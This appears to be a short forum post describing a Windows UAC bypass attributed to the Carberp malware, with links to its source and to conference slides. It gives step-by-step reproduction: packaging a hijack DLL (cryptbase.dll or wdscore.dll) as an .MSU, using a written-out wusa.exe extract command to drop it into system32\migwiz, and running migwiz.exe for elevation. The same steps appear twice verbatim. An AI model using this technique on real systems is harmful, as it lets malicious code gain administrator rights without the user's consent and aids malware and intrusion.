There is another UAC bypass method used in Carberp malware: https://github.com/hzeroo/Carberp/blob/ ... bypass.cpp
Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe
This method is also mentioned here: https://www.syscan360.org/slides/2013_E ... truder.pdf
Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe
This method is also mentioned here: https://www.syscan360.org/slides/2013_E ... truder.pdf